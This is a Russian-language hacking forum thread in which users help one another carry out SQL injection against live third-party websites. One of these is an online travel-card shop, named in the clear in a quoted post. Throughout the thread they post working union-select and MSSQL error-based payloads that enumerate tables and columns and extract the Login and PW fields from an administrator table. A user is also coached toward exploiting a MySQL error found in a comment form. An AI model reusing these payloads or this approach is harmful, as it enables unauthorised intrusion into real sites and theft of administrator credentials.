Вопросы по уязвимостям

[vp$]

Цитата:

Сообщение от trashmail

Круто, спасибо. Хотел бы узнать почему не выводилось обычным способом.

http://www.***.org/vernoticia.php?codigo=10471+and+1=0+union+select+1 ,unhex(hex(table_name)),3,4,5+from+information_sch ema.tables+--+
обычным тоже пашет

[winner13]

Цитата:

Сообщение от vp$

http://www.***.com/shop/voucher_list.asp?Id=1+or+1=@@version--

это mssql

Всё равно что то не выводит http://www.***.com/shop/voucher_list.asp?Id=1+or+1=2+union+select+1,2,3,4, 5,6,7,8-- (Вроде пробелов нету, сохраняю пробел появляется)

По шпаргалке вроде всё делал, и так как знаю пробывал.

[vp$]

Цитата:

Сообщение от winner13

Всё равно что то не выводит http://www.london-travelcards.com/shop/voucher_list.asp?Id=1+or+1=2+union+select+1,2,3,4, 5,6,7,8-- (Вроде пробелов нету, сохраняю пробел появляется)

По шпаргалке вроде всё делал, и так как знаю пробывал.

http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(select(max(table_name) )from[information_schema].tables)--

http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(SELECT%20DB_NAME())--
http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(SELECT%20HOST_NAME())--

[Flakt]

На этом сайте есть таблица gcc_Admin

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,table_name,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null+from+informatio n_schema.tables--

Как вывести колонки через information_schema.columns, менял gcc_Admin на зачаренное – не проходит?

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,column_name,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null+from+informati on_schema.columns+where+table_name=char(103)%2Bcha r(99)%2Bchar(99)%2Bchar(95)%2Bchar(65)%2Bchar(100) %2Bchar(109)%2Bchar(105)%2Bchar(110)--

[Tim]

Цитата:

Сообщение от Flakt

На этом сайте есть таблица gcc_Admin

Как вывести колонки через information_schema.columns, менял gcc_Admin на зачаренное – не проходит?

Login,PW

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,Login,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null+from+gcc_Admin--

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,PW,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null+from+gcc_Admin--

[Flakt]

Цитата:

Сообщение от Tim

Login,PW

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,Login,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null+from+gcc_Admin--

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,PW,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null+from+gcc_Admin--

Спасибо, и не достающая информация

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,table_name,null,null, null,null,null,null,null,null,null,null,null,colum n_name,null,null,null,null,null,null,null+from+inf ormation_schema.columns--

[salut]

в сайте комментарию новости..в комменте напишу ' или 'test' вылазит ошибка

Цитата:

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0')' at line 1

что ето ?

[Flakt]

Цитата:

Сообщение от salut

в сайте комментарию новости..в комменте напишу ' или 'test' вылазит ошибка

что ето ?

Это, скуля, но это не значит, что ее на 100% удастся раскрутить.

[salut]

а вот именно интересно как раскрутить..

[Flakt]

Цитата:

Сообщение от salut

а вот именно интересно как раскрутить..

Мы не экстрасенсы, сайт в студию!